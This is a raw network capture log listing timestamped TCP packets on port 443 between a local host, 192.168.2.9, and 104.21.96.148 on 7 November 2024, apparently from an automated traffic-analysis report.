                                                                                                                                                                                                Nov 7, 2024 17:56:15.656800985 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.656836033 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.656864882 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.656884909 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.656893969 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.656915903 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.657018900 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.657111883 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.657118082 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.659953117 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.659960985 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660032034 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660039902 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660305023 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660361052 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660376072 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660430908 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660461903 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660469055 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.660538912 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.693825960 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.694000959 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.694008112 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.694154978 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.768878937 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.768897057 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.769036055 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.809727907 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.809741974 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.809825897 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.809825897 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.809917927 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.809958935 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.885684013 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.885862112 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:15.926656008 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:15.926719904 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.002582073 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.002731085 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.043499947 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.043729067 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.094877958 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.095011950 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.119168997 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.119251013 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.160700083 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.160789013 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.212002993 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.212089062 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.235950947 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.236011028 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.277983904 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.278100967 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.352802992 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.352850914 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.353116989 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.353116989 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.353137016 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.353838921 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.394669056 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.394757032 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.445590973 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.445702076 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.469883919 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.470030069 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.511620998 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.511764050 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.586596012 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.586739063 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.586740971 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.586756945 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.586781025 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.586807013 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.628505945 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.628603935 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.628746033 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.628746033 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.628752947 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.628858089 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.703177929 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.703419924 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.703579903 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.703650951 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.893579006 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.893671989 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.893887043 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.893939018 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.893944979 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.893955946 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.893981934 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.894795895 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.894853115 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.894865990 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.894870996 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.894917965 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.895673990 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.895744085 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.895751953 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.895802021 CET44349851104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:16.895819902 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.895847082 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:16.897138119 CET49851443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:17.099680901 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:17.099720001 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:17.099790096 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:17.099992990 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:17.100008011 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:17.708128929 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:17.709434032 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:17.709446907 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000324965 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000386000 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000423908 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000458002 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000474930 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000490904 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000498056 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000503063 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000562906 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000595093 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000597000 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000605106 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000636101 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000649929 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.000695944 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115611076 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115677118 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115706921 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115787029 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115828991 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115885973 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115915060 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115922928 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115952969 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115962982 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.115969896 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.116015911 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.116652966 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.116708040 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.116739035 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.116794109 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.116802931 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.116844893 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.117398024 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.117512941 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.117566109 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.117594957 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.117626905 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.117635965 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.117645025 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.118319988 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.118352890 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.118390083 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.118395090 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.118405104 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.118433952 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.167593002 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231482029 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231544018 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231575966 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231607914 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231652021 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231652975 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231664896 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231698990 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231710911 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231719017 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.231967926 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232002974 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232057095 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232065916 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232105017 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232597113 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232664108 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232666016 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232676983 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232719898 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232805967 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.232856035 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.233365059 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.233436108 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.233449936 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.233462095 CET44349872104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.233484030 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.233521938 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.234081984 CET49872443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.247823000 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.247876883 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.247972012 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.248243093 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.248258114 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.867746115 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:18.869362116 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:18.869373083 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.499891043 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.499948978 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.499982119 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500034094 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500080109 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500092983 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500123024 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500123024 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500149012 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500184059 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500197887 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500705957 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.500760078 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.504518986 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.558290005 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.618253946 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.618369102 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.618418932 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.618434906 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632402897 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632467985 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632474899 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632483006 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632519007 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632520914 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632531881 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632574081 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.632997036 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633090973 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633120060 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633136988 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633142948 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633177996 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633759022 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633857965 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633903027 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.633908033 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.683233976 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784076929 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784152031 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784183979 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784200907 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784224987 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784279108 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784286022 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784590960 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784632921 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784638882 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784673929 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784703970 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784713030 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784720898 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.784759998 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.785450935 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.785511971 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.785548925 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.785554886 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.785583973 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.785628080 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.785633087 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.786410093 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.786472082 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.786477089 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.787297964 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.787352085 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.787365913 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.787370920 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.787403107 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.787431002 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.788220882 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.788269043 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.788270950 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.788283110 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.788347006 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.789191008 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.789248943 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.903412104 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.903486967 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.932677031 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.932739973 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933434010 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933465004 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933490038 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933496952 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933532000 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933547020 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933798075 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933859110 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933876991 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933933973 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.933974028 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.934031010 CET49879443192.168.2.9104.21.96.148
                                                                                                                                                                                                Nov 7, 2024 17:56:19.934751987 CET44349879104.21.96.148192.168.2.9
                                                                                                                                                                                                Nov 7, 2024 17:56:19.934814930 CET49879443192.168.2.9104.21.96.148
